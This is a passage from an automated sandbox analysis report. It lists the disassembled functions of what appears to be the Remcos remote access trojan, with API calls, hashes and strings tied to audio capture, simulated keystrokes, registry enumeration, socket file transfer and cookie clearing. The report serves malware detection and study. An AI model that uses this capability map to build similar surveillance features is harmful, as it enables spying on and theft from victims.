                                                        • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                        • waveInStart.WINMM ref: 00401CFE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                        • String ID: dMG$|MG$PG
                                                        • API String ID: 1356121797-532278878
                                                        • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                        • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                                        • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                        • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                                          • Part of subcall function 0041D50F: RegisterClassExA.USER32 ref: 0041D55B
                                                          • Part of subcall function 0041D50F: CreateWindowExA.USER32 ref: 0041D576
                                                          • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                                        • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                                        • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                                        • TranslateMessage.USER32(?), ref: 0041D4E9
                                                        • DispatchMessageA.USER32 ref: 0041D4F3
                                                        • GetMessageA.USER32 ref: 0041D500
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                        • String ID: Remcos
                                                        • API String ID: 1970332568-165870891
                                                        • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                        • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                                        • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                        • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                                        • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                                        • Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                                        • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                        • _memcmp.LIBVCRUNTIME ref: 00445423
                                                        • _free.LIBCMT ref: 00445494
                                                        • _free.LIBCMT ref: 004454AD
                                                        • _free.LIBCMT ref: 004454DF
                                                        • _free.LIBCMT ref: 004454E8
                                                        • _free.LIBCMT ref: 004454F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                        • String ID: C
                                                        • API String ID: 1679612858-1037565863
                                                        • Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                                        • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                                        • Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                                        • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tcp$udp
                                                        • API String ID: 0-3725065008
                                                        • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                        • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                                        • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                        • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 004018BE
                                                        • ExitThread.KERNEL32 ref: 004018F6
                                                        • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                        • String ID: PkG$XMG$NG$NG
                                                        • API String ID: 1649129571-3151166067
                                                        • Opcode ID: f17f11b8b39cffc117ffaa71cd5d18446726339bb65f1098d7a399b3bb622f5a
                                                        • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                                        • Opcode Fuzzy Hash: f17f11b8b39cffc117ffaa71cd5d18446726339bb65f1098d7a399b3bb622f5a
                                                        • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
                                                        • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • CloseHandle.KERNEL32(00000000), ref: 00407A4D
                                                        • MoveFileW.KERNEL32 ref: 00407A6A
                                                        • CloseHandle.KERNEL32(00000000), ref: 00407A95
                                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                                          • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                          • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                        • String ID: .part
                                                        • API String ID: 1303771098-3499674018
                                                        • Opcode ID: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                                                        • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                                        • Opcode Fuzzy Hash: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                                                        • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 004199CC
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 004199ED
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A0D
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A21
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A37
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A54
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A6F
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A8B
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InputSend
                                                        • String ID:
                                                        • API String ID: 3431551938-0
                                                        • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                        • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                                        • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                        • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __freea$__alloca_probe_16_free
                                                        • String ID: a/p$am/pm$zD
                                                        • API String ID: 2936374016-2723203690
                                                        • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                                        • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                                        • Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                                        • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413B8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Enum$InfoQueryValue
                                                        • String ID: [regsplt]$xUG$TG
                                                        • API String ID: 3554306468-1165877943
                                                        • Opcode ID: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                                                        • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                                        • Opcode Fuzzy Hash: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                                                        • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0044B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleCP.KERNEL32 ref: 0044B3FE
                                                        • __fassign.LIBCMT ref: 0044B479
                                                        • __fassign.LIBCMT ref: 0044B494
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000), ref: 0044B4D9
                                                        • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000), ref: 0044B512
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                        • String ID:
                                                        • API String ID: 1324828854-0
                                                        • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                        • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                                        • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                        • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: D[E$D[E
                                                        • API String ID: 269201875-3695742444
                                                        • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                        • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                                        • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                        • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExW.ADVAPI32 ref: 00413D46
                                                          • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                          • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00413EB4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEnumInfoOpenQuerysend
                                                        • String ID: xUG$NG$NG$TG
                                                        • API String ID: 3114080316-2811732169
                                                        • Opcode ID: fc7062b0e2d73897183f332ff677a088385e4ff99dcd0168fd06527908a237fe
                                                        • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                                        • Opcode Fuzzy Hash: fc7062b0e2d73897183f332ff677a088385e4ff99dcd0168fd06527908a237fe
                                                        • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32 ref: 0041363D
                                                          • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                                          • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                        • _wcslen.LIBCMT ref: 0041B763
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                        • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                        • API String ID: 37874593-122982132
                                                        • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                                        • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                                        • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                                        • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                          • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                                                          • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                                        • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                        • API String ID: 1133728706-4073444585
                                                        • Opcode ID: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                                                        • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                                        • Opcode Fuzzy Hash: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                                                        • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                                        • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                                        • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                                        • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                                        • _free.LIBCMT ref: 00450F48
                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                        • _free.LIBCMT ref: 00450F53
                                                        • _free.LIBCMT ref: 00450F5E
                                                        • _free.LIBCMT ref: 00450FB2
                                                        • _free.LIBCMT ref: 00450FBD
                                                        • _free.LIBCMT ref: 00450FC8
                                                        • _free.LIBCMT ref: 00450FD3
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                        • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                                        • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                        • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                                        • int.LIBCPMT ref: 00411183
                                                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                        • std::_Facet_Register.LIBCPMT ref: 004111C3
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                        • String ID: (mG
                                                        • API String ID: 2536120697-4059303827
                                                        • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                        • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                                        • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                        • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                                        • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLastValue___vcrt_
                                                        • String ID:
                                                        • API String ID: 3852720340-0
                                                        • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                        • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                                        • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                        • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0
                                                          • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                                          • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                        • CoUninitialize.OLE32 ref: 00407629
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InitializeObjectUninitialize_wcslen
